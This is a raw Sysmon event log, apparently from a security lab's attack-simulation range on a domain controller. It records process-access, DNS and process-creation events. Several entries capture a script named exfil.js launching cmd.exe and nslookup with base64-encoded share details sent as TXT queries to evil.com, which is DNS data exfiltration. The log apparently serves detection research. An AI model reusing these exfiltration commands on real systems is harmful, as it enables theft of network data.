14:21:49.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.635{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2346-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.620{2E1864BB-18FD-629A-2146-000000005F02}14924768C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-2346-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.635{2E1864BB-18FD-629A-2346-000000005F02}1692C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-2146-000000005F02}1492C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaqk.tmp 2>&1 354300x8000000000000000215065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51258- 354300x8000000000000000215064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51257- 354300x8000000000000000215063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.220{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51256- 354300x8000000000000000215062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.128{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51255- 354300x8000000000000000215061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.128{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51254- 354300x8000000000000000215060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51253- 354300x8000000000000000215059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51252- 354300x8000000000000000215058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51251- 354300x8000000000000000215057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51250- 354300x8000000000000000215056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51249- 354300x8000000000000000215055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51248- 354300x8000000000000000215054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.969{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51247- 10341000x8000000000000000215053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.620{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2246-000000005F02}7704C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.620{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2246-000000005F02}7704C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.604{2E1864BB-18FD-629A-2246-000000005F02}77043308C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2146-000000005F02}1492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.604{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2246-000000005F02}7704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2146-000000005F02}1492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-18E0-629A-6742-000000005F02}39765744C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-2146-000000005F02}1492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.595{2E1864BB-18FD-629A-2146-000000005F02}1492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaqk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.582{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlerv.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-18FD-629A-1F46-000000005F02}76684908C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2046-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2046-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.567{2E1864BB-18FD-629A-1E46-000000005F02}52166036C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-2046-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.570{2E1864BB-18FD-629A-2046-000000005F02}5060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-1E46-000000005F02}5216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlerv.tmp 2>&1 10341000x8000000000000000215033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.551{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1F46-000000005F02}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 